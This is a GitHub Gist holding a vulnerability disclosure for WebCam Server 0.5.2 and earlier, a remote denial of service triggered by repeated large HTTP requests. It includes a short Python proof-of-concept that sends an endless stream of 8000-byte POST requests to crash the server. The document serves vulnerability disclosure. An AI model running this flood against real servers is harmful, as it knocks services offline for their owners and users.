Created
December 15, 2021 02:21
-
-
Save 0xHop/0d065694d56ac3943d8e8c239d80c63f to your computer and use it in GitHub Desktop.
WebCam Server v0.5.2 Denial of Service
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[description] | |
WebcamServer version 0.5.2 and previous does not properly handle clean up memory when receiving HTTP requests. Multiple large requests will trigger an unhandled Structured Exception Handler which will result in an application crash. | |
------------------------------------------ | |
[VulnerabilityType Other] | |
Denial of Service | |
------------------------------------------ | |
[Vendor of Product] | |
en3rgy | |
------------------------------------------ | |
[Affected Product Code Base] | |
Webcam Server 0.5.2 and below | |
------------------------------------------ | |
[Affected Component] | |
Webcam Server process | |
------------------------------------------ | |
[Attack Type] | |
Remote | |
------------------------------------------ | |
[Impact Code execution] | |
False | |
------------------------------------------ | |
[Impact Escalation of Privileges] | |
False | |
------------------------------------------ | |
[Impact Information Disclosure] | |
False | |
------------------------------------------ | |
[Attack Vectors] | |
Repeated large HTTP Requests | |
------------------------------------------ | |
[Reference] | |
https://sourceforge.net/projects/webcamserv/ | |
------------------------------------------ | |
[Has vendor confirmed or acknowledged the vulnerability?] | |
false | |
------------------------------------------ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket | |
import sys | |
ip = "127.0.0.1" | |
port = 80 | |
while True: | |
buffer = b"A" * 8000 | |
request = b"POST " + buffer + b" HTTP 1.1" | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.connect((ip, port)) | |
s.send(request) | |
s.close() | |
print("sending packet") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment